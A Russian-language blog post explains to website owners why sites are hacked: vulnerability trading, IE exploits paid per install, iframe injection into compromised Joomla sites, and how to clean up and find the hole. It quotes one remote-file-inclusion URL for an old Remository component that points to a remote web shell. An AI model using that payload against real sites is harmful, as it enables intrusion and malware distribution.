Info

 

 

Зачем ломают сайты...

 

Блог Dead Krolik'а

Кто и зачем ломает сайты. Сайтовладельцы - будьте осторожны!

Ниже я попытаюсь расписать тот путь, который проходит простая дырка превращаясь в доллар ;)

Откуда берутся дырки

Для начала нам надо иметь эту самую дыру. Иметь не в смысле иметь, а в том смысле, что ее надо найти. Дыра – это плохой или не продуманный код, которые дает осечку. Поиск дыр – тоже бизнес, ведь если кому-то по секрету рассказать о дырочке, которую он сможет использовать раньше других – он тебе вполне может и заплатить за столь ценную информацию.

Есть разные типы уязвимостей, не все можно использовать для полноценного взлома для того что бы очень конкретно покромсать сайт. Например, тип уязвимости – “file inclusion vulnerabily” вполне способен доставить вам серьезные неприятности. Он позволяет, при некоторых условиях, внедрять в ваш скрипт чужие нехорошие скрипты.

Я думаю, что самая распространная дырка в Joomla компонентах это баг в старой версии Remository: “/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://сайт.ком/веб_шелл.txt”. У кого он до сих пор есть – он очень странный человек.

Кому это надо

На свете существуют нехорошие люди которые хотят пользователям рассадить побольше своих троянов (это такая программа, при помощи которой можно удаленно рулить чьим-то компьютером).

А далее эти трояны можно использовать, например, для spam-рассылок или как прокси-сервера для темных дел спаммерства в блоги/форумы/гостевые. Чем больше интернет, тем сильнее такая потребность.

Почему это возможно

Если люди хотят заразить компьютеры трояном – им нужны эти самые компьютеры. С развитием интернета стало понятно, что сканируя интернет на открытые порты и дырки в стеке протоколов или сетевых сервисов операционных систем ничего особо не добиться (эпидемии, вроде Sasser бывают очень редко, да и закрывают их тоже оперативно), а значит нужен совершенно другой путь.

И этот путь для людей создала фирма Microsoft, и называется он “MS Internet Explorer” – браузер, с поистину безграничными багами и возможностями для вторжения. За один этот браузер фирме Microsoft уже можно памятник поставить.

Кто этим занимается и как так получается

Я думаю, что этим занимаются студенты какие-нибудь. Просто берут и заколачивают дополнительную денюжку. Дыра, которую можно использовать для заражения (под IE или под что-то другое) называется “сплоит” (“sploit”). Существуют даже расценки, вроде X баксов за 1000 установленных сплоитов (т.е. по сути загруженных троянов). Для того, что бы набрать тысячи этих самых внедрений надо показать данный код как можно большему количеству людей. А много людей можно поймать только на посещаемых сайтах.

Сплоиты – это вообщем-то тоже не так просто. Человек с улицы его не напишет. Для него нужна прежде всего дыра в этом самом IE, которую он использует. На данный момент дыр так много, что можно сильно об этом не думать. Но чем распространеннее дыра, тем больше людей поставили заплатку или тем скорее антивирус ее обнаружит. А значит наиболее востребованы только новые дыры, еще не известные никому. Сплоит – чаще всего код на языке Javascript или VBScript, который чего-нибудь там мудрит с переменными, что IE не выдерживает извращений и отдается ему весь и навсегда. А дальше загружается дополнительная программа, которая довершает процесс разгрома компьютера и полное его подчинение серверу в сети, который им управляет.

Мы все понимаем, что добровольно ни один владелец хорошего и посещаемого сайта не будет людям такое показывать. А значит надо сайт поломать и показать вредоносный код ничего не подозревающим людям, пришедшим на свой любимый сайт. И тут нам на помощь приходят дыры. Использовав дыру в движке сайта и модифицировав файлы, которые генерит скрипт, можно показать вредоносный код всем посетителям. А кому не повезло с браузером и антивирусом – заразить и сообразить небольшую прибавку к семейному бюджету.

Чаще всего, взломав сайт, в генерируемый код вставляется HTML-код с “iframe” ведущим уже на сайт владельца сплоита, который уже и заражает. Таким образом владелец сплоита может считать количество людей которые были заражены и которые вообще посетили его сайт. Ну и платить деньги только за совершенную работу.

Если в сети до сих пор есть люди, ломающие сайты только для того, что бы написать “hacked by Vasua Pupkin”, то они полные идиоты, нифига не рубящие в современном бизнесе или хакеры-пуристы, делающие это ради игры. В первом случае это могут быть люди, которые “компенсируют недостаток размеров в другом месте” ©, во втором – волосатые дядьки получающие моральное удовлетворение от собственной крутости.

Как ни странно, но это дело давно поставлено на поток. Т.е. нормальные люди (или конторы людей) только кнопочки нажимают “поломать еще 100 сайтов” и “получить бабки”. Есть паучки, которые таскают из гугля сайты, доступные к взлому. Есть паучки, которые ломают. Есть паучки, которые с определенным интервалом сканируют сайты. И если у вас есть свой собственный сайт, то вы вполне можете стать используемой в этом бизнесе единицей.

Если вас поломали

Для начала вам надо об этом узнать. Вам об этом может любезно сообщить хостер и сказать, что мол его уже закидали арбузами и ваш аккаунт временно приостановлен. Ну или вы сами случайно можете найти его. Это уж как повезет.

Далее – копируем к себе все исходные коды движка, установленные на хосте. И просто ищем среди них буковки iframe. Чаще всего их вставляют в шаблон (я говорю про Joomla) или в конец index.php. Но могут запихать и в другие места. После обнаружения это дело надо удалить. Не факт что это сделано через iframe, но чаще всего это так. Не надо исключать других типов вставок.

ВАЖНО! Ни в коем случае не пытайтесь после удаления снова скопировать это на сайт и запускать его уже как бы чистым. Вас снова поломают через пару дней. НАДО НАЙТИ ДЫРУ, без этого запускать сайт бессмысленно. Дыру можно найти по логам того же веб-сервера. Проверьте все установленные расширения и есть ли для них новые версии, которые лишены каких-либо ошибок. Обновите Joomla, если это необходимо. Найдите как вас поломали, если вы не нашли и не закрыли уязвимость – бросьте это дело – снова запускать сайт, это бесполезная работа по вычищению от вредоносного кода.

Итоги и выводы

Итак, краткая схема преступления такова (ну это если вдруг, лень было читать весь предыдущий текст):

Дырявый сайт
Установка кода iframe
Человек заходит на сайт
Автоматически в iframe грузится плохой сайт
Если ему не повезло с браузером то он заражается
На компьютере появляется троян Компьютер используется для разных не совсем хороших целей.

Стопроцентной защиты не существует, ну разве что использовать офф-лайн CMS или делать статичный сайт на HTML. Дыры всегда можно найти, воспринимайте это как аксиому. А потому защищайте свои сайты, и не дайте заработать на своем труде деньги.

TopList

<plaintext>